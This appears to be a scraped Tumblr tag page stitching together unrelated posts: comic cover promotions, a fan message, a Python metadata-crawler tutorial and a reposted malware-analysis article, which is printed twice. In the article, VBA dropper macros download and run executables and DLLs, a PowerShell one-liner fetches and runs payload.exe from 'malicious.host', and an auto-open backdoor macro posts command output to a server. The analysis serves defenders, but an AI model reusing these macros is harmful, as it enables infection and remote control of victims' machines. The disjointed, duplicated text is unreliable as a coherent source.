#this 1 is at htmlfile

Explore tagged Tumblr posts

Text

FRESH, FLY SCI-FI STRAIGHT OUTTA ED BENES STUDIO -- THIS PRINCESS OF MARS IS PACKED!

PIC(S) INFO: Mega spotlight on Fred Benes cover art to "John Carter: Warlord of Mars" Vol. 1 #3 -- Published & preliminary variant. January, 2015. Dynamite Entertainment.

ISSUE OVERVIEW: "Alien invaders have conquered John Carter's adopted world of Barsoom. John Carter endeavors to reach the occupied city of Helium, where his beloved Dejah Thoris is held captive by the invaders. But Dejah Thoris is no princess-in-peril, as she hatches a plot to escape from her captors and lead her people in bloody rebellion! Classic planetary adventure in tradition of grand master Edgar Rice Burroughs!"

-- DYNAMITE ENTERTAINMENT, c. winter 2015

Sources: www.dynamite.com/htmlfiles/viewProduct.html?PRO=C72513022350003011 & Comic Art Community.

#John Carter: Warlord of Mars#Warlord of Mars#Dejah Thoris of Mars#Dejah Thoris#Ed Benes#Fred Benes#Fred Benes Artist#John Carter#Sci-fi Fri#Sci-fi Art#Sci-fi#Space fantasy#Science fantasy#Cover Art#A Princess of Mars#Edgar Rice Burroughs#Red Martian Princess#Dynamite Comics#Dynamite Entertainment#Girls of Dynamite#Women of Dynamite#John Carter Warlord of Mars#Fred Benes Art#Barsoom Series#Dynamite#Princess of Helium#Female form#Female figure#Variant Cover#Female body


Text

666 #1

you’re SO adorable!!!! you have such a sweet personality and i LOVELOVELOVE your art it’s so gorgeous???!!!! I LOVE YOU SM!!!!!!!


Photo

And out this week! :D Chastity #1! Published by @dynamitecomics Written by @handaxe Art by me color by @bryan_valenza https://www.dynamite.com/htmlfiles/viewProduct.html?PRO=C72513028389401011 https://www.instagram.com/p/B2Ji-uKIVC8/?igshid=sxpzw6cjm0ka


Text

Programming a website crawler with Python 3 - Part 1 - Reading metadata

With the scripting language Python 3 you can build a crawler for a website's metadata fairly simply and quickly. In this post I would like to show you how to build your own crawler.

Foreword

Because I want to keep an eye on the SEO metrics of my blog, I use several tools that make the work a little easier. One of them is Ubersuggest by Neil Patel. With this tool you can run a site audit and get a list of suggestions for improving your SEO metrics. The free version does not show every suggestion, which I can understand: he has invested a great deal in this tool, has to make a living too, and naturally wants to be paid for his work.

Overview

In this first part I want to show how I read the metadata of my blog. A major problem with web crawlers is that the page first has to be read and then analyzed. As a result, porting a crawler to other sites is sometimes very difficult or involves a lot of work.

What is metadata?

The metadata of a web page is the data that describes the page's content and gives information about the author and the keywords. Search engines collect this data and store it, sorted, in an index.

Metadata of my blog

Programming a crawler

Let's start programming our crawler. As a development environment I use Anaconda; this powerful tool already ships with everything we need, so we can start programming right after installing it.

Step 1 - Reading the web page

In this example I want to analyze my blog, so we start with the address https://draeger-it.blog. When we open this page in a browser, the HTML, JavaScript, images and videos are loaded and displayed (that is, loaded, parsed and rendered).

Loading the content

In this step we also load the content, but we "only" want to parse it and evaluate it ourselves. To load the data (the so-called HTML content) we use the Requests library, which was already installed with Anaconda.

    import requests

    req = requests.get('https://draeger-it.blog')
    # print the HTTP status code
    # If everything is OK, the status code 200 is returned.
    print(req.status_code)
    # the HTML content of the page
    print(req.content)

With "import" we state that we want to load the "requests" library. We then send a request with the function "get" and the address "https://draeger-it.blog" and receive a complex Response object back. This object contains, among other things, the status code and the content. A list of valid HTTP status codes can be found in the Wikipedia article "HTTP-Statuscode": Seite „HTTP-Statuscode“. In: Wikipedia, Die freie Enzyklopädie. Bearbeitungsstand: 28. Februar 2020, 09:34 UTC. URL: https://de.wikipedia.org/w/index.php?title=HTTP-Statuscode&oldid=197248847 (Abgerufen: 8. April 2020, 12:37 UTC)

If you want to print all the data of the Response object, you can do so with print(req.__dict__).

HTML content

Before we deal with processing the HTML structure, let's first look at a small construct:

Window title

a heading

This small piece of HTML displays the heading "a heading" on the page and "Window title" in the browser tab.
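To make the relationship between markup and displayed text concrete, here is a minimal sketch that pulls the title and the heading back out of such a page. It deliberately uses Python's built-in html.parser module instead of BeautifulSoup so that it runs without extra packages. The markup in SAMPLE_HTML is an assumed reconstruction of the small example page, and the names TitleAndHeadingParser and extract_title_and_headings are hypothetical.

```python
from html.parser import HTMLParser

# Assumed reconstruction of the small example page; the exact markup is a guess.
SAMPLE_HTML = (
    "<html><head><title>Window title</title></head>"
    "<body><h1>a heading</h1></body></html>"
)


class TitleAndHeadingParser(HTMLParser):
    """Collects the text found inside <title> and <h1> elements."""

    def __init__(self):
        super().__init__()
        self._current = None  # tracked tag we are currently inside, if any
        self.found = {"title": [], "h1": []}

    def handle_starttag(self, tag, attrs):
        # Start recording text when one of the tracked tags opens.
        if tag in self.found:
            self._current = tag

    def handle_endtag(self, tag):
        # Stop recording once the tracked tag closes.
        if tag == self._current:
            self._current = None

    def handle_data(self, data):
        if self._current is not None:
            self.found[self._current].append(data)


def extract_title_and_headings(html):
    parser = TitleAndHeadingParser()
    parser.feed(html)
    parser.close()
    return parser.found


print(extract_title_and_headings(SAMPLE_HTML))
```

The parser only reacts to the two tags it cares about, which is the same idea BeautifulSoup offers more conveniently through functions such as find_all.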

HTML structure in the browser

Parsing the HTML structure

Now that we have loaded the HTML content successfully, we want to read and process it by machine; this is called parsing. For this task we use another library called BeautifulSoup, which, like Requests, was already installed with Anaconda.

    import requests
    from bs4 import BeautifulSoup

    req = requests.get("https://draeger-it.blog")
    beautifulSoup = BeautifulSoup(req.content, "html.parser")

We can now use various functions to search for elements in the HTML content, or collect them into a list and process them. Before we parse a complex HTML document (such as the page https://draeger-it.blog), let's start with a small example. Under the following link you will find a compressed folder with a small website. This page contains a few meta tags, images and text (headings, paragraphs) and, of course, some CSS for styling. You can unpack the ZIP file into any folder, but I recommend unpacking it into the project directory of your Python 3 project.

Sample page in the browser

Excursus: loading file contents

Since the HTML content is now loaded from a file rather than from the internet, we need a function that reads the contents of a file and returns them. I have already explained how to process a file in Python 3 in the post "Python #10: Dateiverarbeitung", and I would like to build on that here. The function "readHtmlFile" takes as its parameter the absolute path to the file, or a path relative to the location of the Python 3 script. It reads the whole file, removes the line breaks and stores the result in the variable "htmlContent". At the end, the variable "htmlContent" is returned.

    def readHtmlFile(file):
        htmlContent = ""
        with open(file, "r") as htmlFile:
            htmlContent = htmlFile.read().replace('\n', '')
        return htmlContent

Step 2 - Parsing / filtering the web page

In the first step I showed you how to load data from a web page or from a file. We now want to process this data with BeautifulSoup. A big advantage is that we do not necessarily need to know the HTML tree to get to the HTML tags we want. First, as already mentioned, we want to process a simple HTML page. You will find the download link for this page a little further up.

Printing all headings

First we want to print all headings from the HTML document on the console. With the function "find_all" we get a list of all HTML elements that match the given tag.

    from bs4 import BeautifulSoup

    def readHtmlFile(file):
        htmlContent = ""
        with open(file, "r") as htmlFile:
            htmlContent = htmlFile.read().replace('\n', '')
        return htmlContent

    htmlContent = readHtmlFile('./testhtml/sample.html')
    beautifulSoup = BeautifulSoup(htmlContent, "html.parser")

    for ue in beautifulSoup.find_all('h1'):
        print(ue)

In this example I print the HTML tag together with its content on the console and get the following output:

Test 1

Test 2

Test 3

If we only want the content of the HTML tag, we can get it with the attribute "ue.text".

    for ue in beautifulSoup.find_all('h1'):
        print(ue.text)

    Test 1
    Test 2
    Test 3

This attribute provides, on every HTML element, the text between the opening and the closing tag, so it also works for div, span, p and so on. If you only want the first element from the HTML content, you can use the function "select_one".

    print(beautifulSoup.select_one('h1').text)

It is important, however, to check that an element was actually found, so that you do not end up working with a NoneType.

    tag = beautifulSoup.select_one('h1')
    if tag is not None:
        print(tag.text)

Printing all paragraphs with the CSS class

We can also filter for specific HTML tags that have an attribute with a particular value.

    for tag in beautifulSoup.select('p'):
        print(tag.text)

Step 3 - Reading the meta tags

The meta tags we are interested in first have the following attributes, values and formats.

| Attribute | Value | Format |
|---|---|---|
| name | author | String |
| name | description | String |
| property | og:locale | String |
| property | article:tag | List |
| property | og:title | String |
| property | article:published_time | Date / timestamp with time zone |
| property | article:modified_time | Date / timestamp with time zone |

Once the HTML tag has been found, we can access its attributes by key, much like the entries of a dictionary:

    for tag in beautifulSoup.select('meta'):
        if tag['name'] == 'author':
            print(tag)

However, we have a problem if this attribute does NOT exist, so here too we have to add an extra check to keep our script running cleanly.

    for tag in beautifulSoup.select('meta'):
        if tag.get("name", None) == "author":
            print(tag.get("content", None))

The function "get" on the HTML tag optionally takes a parameter that is returned if the attribute was not found. In this case we return None.
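The "look up an attribute, fall back to a default" pattern can be tried without any download. The following is a minimal sketch that collects meta tags into a dictionary. It uses Python's built-in html.parser as a stand-in for BeautifulSoup so that it runs without extra packages. The head section in SAMPLE_HEAD is hypothetical and only modelled on the values shown in this post, and the names MetaTagParser and read_meta are my own.

```python
from html.parser import HTMLParser


class MetaTagParser(HTMLParser):
    """Collects the content of <meta> tags keyed by their name or property."""

    def __init__(self):
        super().__init__()
        self.meta = {}

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        attributes = dict(attrs)
        # dict.get returns None instead of raising when an attribute is missing.
        key = attributes.get("name") or attributes.get("property")
        content = attributes.get("content")
        if key is not None and content is not None:
            self.meta[key] = content


def read_meta(html):
    parser = MetaTagParser()
    parser.feed(html)
    parser.close()
    return parser.meta


# Hypothetical head section, modelled on the values shown in the post.
SAMPLE_HEAD = """
<head>
  <meta charset="utf-8">
  <meta name="author" content="Max Mustermann">
  <meta property="og:locale" content="de_DE">
  <meta property="article:published_time" content="2020-04-07T17:43:26+00:00">
</head>
"""

meta = read_meta(SAMPLE_HEAD)
print(meta.get("author"))
print(meta.get("description", "no description found"))
```

The charset tag has neither a name nor a property, so it is skipped silently rather than causing an error, which is the behaviour the extra check in the text is meant to achieve.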
    from bs4 import BeautifulSoup

    def readHtmlFile(file):
        htmlContent = ""
        with open(file, "r") as htmlFile:
            htmlContent = htmlFile.read().replace('\n', '')
        return htmlContent

    def printMetaContent(tag, attributName, attributWert):
        # print the content only if the tag carries the requested attribute value
        if tag.get(attributName, None) == attributWert:
            print(tag.get("content", None))

    htmlContent = readHtmlFile('./testhtml/sample.html')
    beautifulSoup = BeautifulSoup(htmlContent, "html.parser")

    for tag in beautifulSoup.select('meta'):
        printMetaContent(tag, 'name', 'author')
        printMetaContent(tag, 'name', 'description')
        printMetaContent(tag, 'property', 'og:locale')
        printMetaContent(tag, 'property', 'og:title')
        printMetaContent(tag, 'property', 'article:published_time')
        printMetaContent(tag, 'property', 'article:modified_time')

To keep the source code clearer, I moved the code that checks the HTML tag into its own function and pass in the tag together with the two values to check. The result is our data from the meta tags of the HTML page.

    Max Mustermann
    Eine einfache Seitenbeschreibung welche in der Google Sucher erscheinen würde.
    de_DE
    Dieser Titel würde in einem sozialen Netzwerk stehen!
    2020-04-07T17:43:26+00:00
    2020-04-07T17:52:31+00:00

The text is not encoded correctly partly because we load the data from a file. If you load the content from a web page instead, the umlauts are displayed correctly.
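One likely cause of garbled umlauts when reading from a file is that open() falls back to the platform's default encoding when none is given. The following is a minimal sketch, assuming the sample file is stored as UTF-8, which is my assumption and not stated in the post. The function name read_html_file is hypothetical, and unlike readHtmlFile it leaves line breaks untouched.

```python
import os
import tempfile


def read_html_file(path, encoding="utf-8"):
    """Read a whole HTML file as text using an explicit encoding."""
    with open(path, "r", encoding=encoding) as html_file:
        return html_file.read()


# Write a small file with umlauts and read it back to check the round trip.
sample = '<meta name="description" content="würde läd">'
with tempfile.TemporaryDirectory() as folder:
    path = os.path.join(folder, "sample.html")
    with open(path, "w", encoding="utf-8") as handle:
        handle.write(sample)
    print(read_html_file(path) == sample)
```

Passing the encoding explicitly makes the result independent of the machine the script runs on.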
    from bs4 import BeautifulSoup
    import requests

    def printMetaContent(tag, attributName, attributWert):
        # print "value: content" only if the tag carries the requested attribute value
        if tag.get(attributName, None) == attributWert:
            print(attributWert, ': ', tag.get("content", None))

    req = requests.get("https://draeger-it.blog/arduino-lektion-92-kapazitiver-touch-sensor-test-mit-einer-aluminiumplatte/")
    beautifulSoup = BeautifulSoup(req.content, "html.parser")

    for tag in beautifulSoup.select('meta'):
        printMetaContent(tag, 'name', 'author')
        printMetaContent(tag, 'name', 'description')
        printMetaContent(tag, 'property', 'og:locale')
        printMetaContent(tag, 'property', 'og:title')
        printMetaContent(tag, 'property', 'article:published_time')
        printMetaContent(tag, 'property', 'article:modified_time')
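The two article timestamps arrive as plain strings. Before evaluating them, it can help to turn them into datetime objects. This is a minimal sketch using datetime.fromisoformat from the standard library (Python 3.7 or newer); the function name parse_timestamp is hypothetical and the two values are the ones printed in the sample output above.

```python
from datetime import datetime


def parse_timestamp(value):
    """Parse an ISO 8601 timestamp with a UTC offset such as +00:00."""
    return datetime.fromisoformat(value)


published = parse_timestamp("2020-04-07T17:43:26+00:00")
modified = parse_timestamp("2020-04-07T17:52:31+00:00")

# Both values carry their time zone, so they can be compared and subtracted.
print(modified > published)
print(modified - published)
```

Because the time zone is part of the parsed value, differences between timestamps stay correct even if two pages report their times with different offsets.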

Preview of part two

In the second part we will evaluate the data against Google's generally accepted "SEO guidelines" and save it to a file. First we will save the data comma-separated in a CSV file, and then I will show how to save the data in a Microsoft Excel document (*.xlsx).

Excel report - Meta Crawler

Storing the data in an Excel document has the advantage that no separate check for the CSV delimiter is needed. We can also create charts from the collected data to get an overview even faster.


Link



Warning. It has come to my attention that Sons of Ares Issue #1 has escaped from custody and is now at large in the world. It is bloody, sexy, and extremely addictive. Approach with caution, or call a friend for moral support before purchasing at your local comic store or online via the completely convenient link below.


Photo







HOWLERS IT’S HAPPENING!!!! All images/caption/info from Pierce Brown’s Facebook page, I’m only spreading the word.

In order of top to bottom:

1. Iron Rain, 0 PCE

2. Agea, Mars 720 PCE

3. Martian Terraforming

4. Unlikely Orbits

“Hot off the press, here's a sneak peek at a few of the first pages of SONS OF ARES. It's a bewildering process seeing this world become a comic. Staggering to see how much work from talented people go into it, and how it becomes the vision not just of the original author but of the team put together. I'm lucky to have had Dynamite Comics put together a squad of veterans to shepherd me through the process. Here's the skinny on how it works. I come up with an outline, a dense one for six issues which tell one coherent story. Rik Hoskins, the writer then tackles the onerous job of translating my outline to script format. I come in with revisions. Get all spicy on that dialogue and make sure the world building elements are coherent with the Red Rising world. Then Rik gives another draft, then back and back it goes. Then an artist (Eli Powell) breaks down Rik's draft into panels and a page layout with simplified concept images. I give notes. Then he gets to making the final drawings. More notes. Then Eli inks the final(ish) images. More notes. Then it goes to a colorist. More notes. Then the words that Rik wrote in the original script are inserted. More notes till the final product is complete. This happens for six issues, each with their own independent cycle. As this is happening, a cover artist (Toby Cypress) is taking my cover ideas and doing his own take on them. Notes go back and forth, and Eli adds his variant covers, till we have a finished cover. Hope that illuminates. The first issue of the comic will be out in comic shops (and is available for pre-order now). May 10, 2017 Pre Order at https://www.dynamite.com/htmlfiles/viewProduct.html… Or go to your local comic store, support the whole comic community and save yourself those pesky S&H fees” - Brown

#pierce brown#sons of ares#sons of ares comic#red rising#golden son#morning star#iron gold#howlers#darrow au andromedus#darrow of lykos#the reaper#the reaper of mars#the gorydamn reaper#the bloodydamn reaper#bloodydamn#gorydamn#comics#scifi#info post#dynamite comics


Text







THE SCI-FI/FANTASY WORLD OF THE KIRBYVERSE EXPLODES IN GLORIOUS GOUACHE STYLE

PIC(S) INFO: Mega spotlight on cover art to "Kirby: Genesis -- Captain Victory" Vol. 1 #1. October, 2011. Dynamite Entertainment. Artwork by Alex Ross.

PIC #2: 983x1520 -- a published eBay copy, and one of my favorite Alex Ross covers of all time.

Sources: www.dynamite.com/htmlfiles/viewProduct.html?PRO=C725130179654 & eBay.

#Captain Victory#Kirby: Genesis#Sci-fi Art#Jack King Kirby#Jack Kirby#Kirbyverse#Sci-fi Fri#Dynamite Entertainment#Sci-fi#Captain Victory and the Galactic Rangers#Galactic Rangers#The Galactic Rangers#Kirby: Genesis -- Captain Victory Vol. 1#Dynamic Forces#Cover Art#Illustration#Alex Ross#Kirby Genesis#Gouache Style#Kirby: Genesis Vol. 1#Kirby Genesis Vol. 1#Captain Victory Vol. 1#Dynamite#Sci-fi fantasy#Paintings#Alex Ross Art#Dynamite Comics


Text

Original Post from Security Affairs Author: Pierluigi Paganini

The malware expert Marco Ramilli collected a small set of VBA Macros widely re-used to “weaponize” Maldoc (Malware Document) in cyber attacks.

Nowadays one of the most frequent cybersecurity threats comes from malicious (Office) documents sent over email or instant messaging. Examples of analyzed threats include: Step By Step Office Dropper Dissection, Spreading CVS Malware over Google, Microsoft Powerpoint as Malware Dropper, MalHIDE, Info Stealing: a New Operation in the Wild, Advanced All in Memory CryptoWorm, etc. Many analyses over the past few years have shown that attackers love to reuse code: they prefer to modify, obfuscate and finally encrypt already known code rather than write new “attacking modules” from scratch. Hence the idea to collect a small set of VBA Macros widely re-used to “weaponize” Maldoc (Malware Document) in contemporary cyber attacks.

Very frequently Office documents such as Microsoft Excel or Microsoft Word files are used as droppers. The core concept of a dropper is to download and execute a third-party payload (or a second stage), and when you analyse an Office dropper you will often encounter many layers of obfuscation. Obfuscation makes the analysis harder, but once you get past that stage you will probably see VBA code like the following.

Download And Execute an External Program

Private Sub DownloadAndExecute() Dim droppingURL As String Dim localPath As String Dim WinHttpReq As Object, oStream As Object Dim result As Integer droppingURL = "https://example.com/mal.exe" localPath = "c://asd.exe" Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP") WinHttpReq.setOption(2) = 13056 ' Ignore cert errors WinHttpReq.Open "GET", droppingURL, False ', "username", "password" WinHttpReq.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" WinHttpReq.Send If WinHttpReq.Status = 200 Then Set oStream = CreateObject("ADODB.Stream") oStream.Open oStream.Type = 1 oStream.Write WinHttpReq.ResponseBody oStream.SaveToFile localPath, 2 ' 1 = no overwrite, 2 = overwrite (will not work with file attrs) oStream.Close CreateObject("WScript.Shell").Run localPath, 0 End If End Sub

The main idea behind this function (or sub-routine) is to invoke the ServerXMLHTTP object to download a file from an external resource, save it to a local directory (ADODB.Stream object) and finally execute it through the WScript.Shell object. You might find variants of this behavior: for example, language checks that target specific countries, or checks for an already infected machine that avoid network traffic if the file is already at localPath. A very common way to add such an infection check on the same victim is, for example, to add the following code before the HTTP request.

If Dir(localPath, vbHidden + vbSystem) = "" Then

Another very common way to weaponize Office files is to download and execute a DLL instead of an external file. In such a case the exported DLL function can be invoked directly from the VBA code as follows.

Drop And Execute External DLL

Private Sub DropAndRunDll() Dim dll_Loc As String dll_Loc = Environ("AppData") & "MicrosoftOffice" If Dir(dll_Loc, vbDirectory) = vbNullString Then Exit Sub End If VBA.ChDir dll_Loc VBA.ChDrive "C" 'Download DLL Dim dll_URL As String dll_URL = "https://example.com/mal.dll" Dim WinHttpReq As Object Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0") WinHttpReq.Open "GET", dll_URL, False WinHttpReq.send myURL = WinHttpReq.responseBody If WinHttpReq.Status = 200 Then Set oStream = CreateObject("ADODB.Stream") oStream.Open oStream.Type = 1 oStream.Write WinHttpReq.responseBody oStream.SaveToFile "Saved.asd", 2 oStream.Close ModuleExportedInDLL.Invoke End If End Sub

Running a DLL or an external PE is not the only way to run code on the victim machine; PowerShell can be used as well. A nice way to execute PowerShell without direct access to PowerShell.exe is to use its DLLs; thanks to the PowerShdll project this is possible, for example, in the following way.

Dropping and Executing PowerShell

Sub RunDLL() DownloadDLL Dim Str As String Str = "C:WindowsSystem32rundll32.exe " & Environ("TEMP") & "powershdll.dll,main . { Invoke-WebRequest -useb "YouWish" } ^| iex;" strComputer = "." Set objWMIService = GetObject("winmgmts:\" & strComputer & "rootcimv2") Set objStartup = objWMIService.Get("Win32_ProcessStartup") Set objConfig = objStartup.SpawnInstance_ Set objProcess = GetObject("winmgmts:\" & strComputer & "rootcimv2:Win32_Process") errReturn = objProcess.Create(Str, Null, objConfig, intProcessID) End Function Sub DownloadDLL() Dim dll_Local As String dll_Local = Environ("TEMP") & "powershdll.dll" If Not Dir(dll_Local, vbDirectory) = vbNullString Then Exit Sub End If Dim dll_URL As String #If Win64 Then dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x64/Release/PowerShdll.dll" #Else dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x86/Release/PowerShdll.dll" #End If Dim WinHttpReq As Object Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0") WinHttpReq.Open "GET", dll_URL, False WinHttpReq.send myURL = WinHttpReq.responseBody If WinHttpReq.Status = 200 Then Set oStream = CreateObject("ADODB.Stream") oStream.Open oStream.Type = 1 oStream.Write WinHttpReq.responseBody oStream.SaveToFile dll_Local oStream.Close End If End Sub

Or if you have direct access to PowerShell.exe you might use a simple inline script as the following one. This is quite common in today’s Office droppers as well.

Simple PowerShell Drop and Execute External Program

powershell (New-Object System.Net.WebClient).DownloadFile('http://malicious.host:5000/payload.exe','microsoft.exe');Start-Process 'microsoft.exe';exit;

By applying those techniques (HTTP and execute commands) you might decide to run commands on the victim machine, in effect having a backdoor. I actually saw this code a few times in connection with manual attacks back in 2017. The code below comes from the great work by sevagas.

Dim serverUrl As String ' Auto generate at startup Sub Workbook_Open() Main End Sub Sub AutoOpen() Main End Sub Private Sub Main() Dim msg As String serverUrl = "<<>>" msg = "<<>>" On Error GoTo byebye msg = PlayCmd(msg) SendResponse msg On Error GoTo 0 byebye: End Sub 'Sen data using http post' 'Note: 'WinHttpRequestOption_SslErrorIgnoreFlags, // 4 ' See https://msdn.microsoft.com/en-us/library/windows/desktop/aa384108(v=vs.85).aspx' Private Function HttpPostData(URL As String, data As String) 'data must have form "var1=value1&var2=value2&var3=value3"' Dim objHTTP As Object Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1") objHTTP.Option(4) = 13056 ' Ignore cert errors because self signed cert objHTTP.Open "POST", URL, False objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded" objHTTP.SetTimeouts 2000, 2000, 2000, 2000 objHTTP.send (data) HttpPostData = objHTTP.responseText End Function ' Returns target ID' Private Function GetId() As String Dim myInfo As String Dim myID As String myID = Environ("COMPUTERNAME") & " " & Environ("OS") GetId = myID End Function 'To send response for command' Private Function SendResponse(cmdOutput) Dim data As String Dim response As String data = "id=" & GetId & "&cmdOutput=" & cmdOutput SendResponse = HttpPostData(serverUrl, data) End Function ' Play and return output any command line Private Function PlayCmd(sCmd As String) As String 'Run a shell command, returning the output as a string' ' Using a hidden window, pipe the output of the command to the CLIP.EXE utility... 
' Necessary because normal usage with oShell.Exec("cmd.exe /C " & sCmd) always pops a windows Dim instruction As String instruction = "cmd.exe /c " & sCmd & " | clip" CreateObject("WScript.Shell").Run instruction, 0, True ' Read the clipboard text using htmlfile object PlayCmd = CreateObject("htmlfile").ParentWindow.ClipboardData.GetData("text") End Function

You will probably never see code exactly as described here, but you will likely find many similarities with the macros you analyse in your next MalDoc analyses. Just remember that on the one hand attackers love to reuse code, but on the other hand they really like to customize it. In your next VBA macro analysis, keep these stereotypes in mind to speed up your work.
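From the analyst's side, the recurring building blocks above can serve as a quick first-pass checklist. The following is a minimal sketch of such a triage helper, assuming the macro source has already been extracted from the document as plain text. The function name triage_macro and the grouping into categories are hypothetical; the indicator strings are the object and command names that appear in the examples in this post. Plain substring matching will miss obfuscated macros, so a clean result proves nothing.

```python
# Indicator strings taken from the macro examples discussed in the post.
INDICATORS = {
    "download": [
        "MSXML2.ServerXMLHTTP",
        "WinHttp.WinHttpRequest",
        "DownloadFile",
        "Invoke-WebRequest",
    ],
    "write_to_disk": ["ADODB.Stream", "SaveToFile"],
    "execute": ["WScript.Shell", "rundll32", "Win32_Process", "Start-Process"],
    "auto_run": ["AutoOpen", "Workbook_Open"],
}


def triage_macro(source):
    """Return the indicator strings found in the macro text, grouped by category."""
    lowered = source.lower()  # VBA is case-insensitive, so compare in lower case
    hits = {}
    for category, needles in INDICATORS.items():
        found = [needle for needle in needles if needle.lower() in lowered]
        if found:
            hits[category] = found
    return hits


# Harmless two-line fragment used only to exercise the function.
fragment = (
    'Set r = CreateObject("MSXML2.ServerXMLHTTP.6.0")\n'
    'CreateObject("wscript.shell").Run p, 0\n'
)
print(triage_macro(fragment))
```

A macro that hits the download, write_to_disk and execute categories at once matches the dropper pattern described above and is a reasonable candidate for closer manual analysis.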

Nowadays one of the most frequent cybersecurity threat comes from Malicious (office) document shipped over eMail or Instant Messaging. Some analyzed threats examples include: Step By Step Office Dropper Dissection, Spreading CVS Malware over Google, Microsoft Powerpoint as Malware Dropper, MalHIDE, Info Stealing: a New Operation in the Wild, Advanced All in Memory CryptoWorm, etc. Many analyses over the past few years taught that attackers love re-used code and they prefer to modify, obfuscate and finally encrypt already known code rather than writing from scratch new “attacking modules”. Here comes the idea to collect a small set of VBA Macros widely re-used to “weaponize” Maldoc (Malware Document) in contemporary cyber attacks.

Very frequently Office documents such as Microsoft Excel or Microsoft Doc are used as droppers. The core concept of a dropper is to Download and to Execute a third party payload (or a second stage) and often when you analyse Office dropper you would experience many layers of obfuscation. Obfuscation comes to make the analysis harder and harder, but once you overcome that stage you would probably see a VBA code looking like the following one.

Download And Execute an External Program

Private Sub DownloadAndExecute() Dim droppingURL As String Dim localPath As String Dim WinHttpReq As Object, oStream As Object Dim result As Integer droppingURL = "https://example.com/mal.exe" localPath = "c://asd.exe" Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP") WinHttpReq.setOption(2) = 13056 ' Ignore cert errors WinHttpReq.Open "GET", droppingURL, False ', "username", "password" WinHttpReq.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" WinHttpReq.Send If WinHttpReq.Status = 200 Then Set oStream = CreateObject("ADODB.Stream") oStream.Open oStream.Type = 1 oStream.Write WinHttpReq.ResponseBody oStream.SaveToFile localPath, 2 ' 1 = no overwrite, 2 = overwrite (will not work with file attrs) oStream.Close CreateObject("WScript.Shell").Run localPath, 0 End If End Sub

The main idea behind this function (or sub-routine) is to invoke ServerXMLHTTP object to download a file from an external resource, to save it on local directory (ADODB.Stream object) and finally to execute it through the object WScript.Shell. You might find variants of this behavior, for example you might find controls over language to target specific countries or specific control on already infected machine, for example by avoiding network traffic if the file is already in the localPath. A possible very common way to add infection control on the same victim is, for example, by adding the following code before the HTTP request.

If Dir(localPath, vbHidden + vbSystem) = "" Then

Another very common way to weaponize Office files is to download and to execute a DLL instead of external file. In such a case we can invoke the exported DLL function directly from the VBA code as follows.

Drop And Execute External DLL

Private Sub DropAndRunDll() Dim dll_Loc As String dll_Loc = Environ("AppData") & "MicrosoftOffice" If Dir(dll_Loc, vbDirectory) = vbNullString Then Exit Sub End If VBA.ChDir dll_Loc VBA.ChDrive "C" 'Download DLL Dim dll_URL As String dll_URL = "https://example.com/mal.dll" Dim WinHttpReq As Object Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0") WinHttpReq.Open "GET", dll_URL, False WinHttpReq.send myURL = WinHttpReq.responseBody If WinHttpReq.Status = 200 Then Set oStream = CreateObject("ADODB.Stream") oStream.Open oStream.Type = 1 oStream.Write WinHttpReq.responseBody oStream.SaveToFile "Saved.asd", 2 oStream.Close ModuleExportedInDLL.Invoke End If End Sub

Running DLL and External PE is not the only solution to run code on the victim machine, indeed we might use Powershell as well ! A nice way to execute PowerShell without direct access to PowerShell.exe is by using its DLLs, thanks to PowerShdll project this is possible, for example, in the following way

Dropping and Executing PowerShell

Sub RunDLL() DownloadDLL Dim Str As String Str = "C:WindowsSystem32rundll32.exe " & Environ("TEMP") & "powershdll.dll,main . { Invoke-WebRequest -useb "YouWish" } ^| iex;" strComputer = "." Set objWMIService = GetObject("winmgmts:\" & strComputer & "rootcimv2") Set objStartup = objWMIService.Get("Win32_ProcessStartup") Set objConfig = objStartup.SpawnInstance_ Set objProcess = GetObject("winmgmts:\" & strComputer & "rootcimv2:Win32_Process") errReturn = objProcess.Create(Str, Null, objConfig, intProcessID) End Function Sub DownloadDLL() Dim dll_Local As String dll_Local = Environ("TEMP") & "powershdll.dll" If Not Dir(dll_Local, vbDirectory) = vbNullString Then Exit Sub End If Dim dll_URL As String #If Win64 Then dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x64/Release/PowerShdll.dll" #Else dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x86/Release/PowerShdll.dll" #End If Dim WinHttpReq As Object Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0") WinHttpReq.Open "GET", dll_URL, False WinHttpReq.send myURL = WinHttpReq.responseBody If WinHttpReq.Status = 200 Then Set oStream = CreateObject("ADODB.Stream") oStream.Open oStream.Type = 1 oStream.Write WinHttpReq.responseBody oStream.SaveToFile dll_Local oStream.Close End If End Sub

Or if you have direct access to PowerShell.exe you might use a simple inline script as the following one. This is quite common in today’s Office droppers as well.

Simple PowerShell Drop and Execute External Program

powershell (New-Object System.Net.WebClient).DownloadFile('http://malicious.host:5000/payload.exe','microsoft.exe');Start-Process 'microsoft.exe';exit;

By applying those techniques (http and execute commands) you might decide to run commands on the victim machine such having a backdoor. Actually I did see this code few times related to manual attacks back in 2017. The code below comes from the great work made by sevagas.

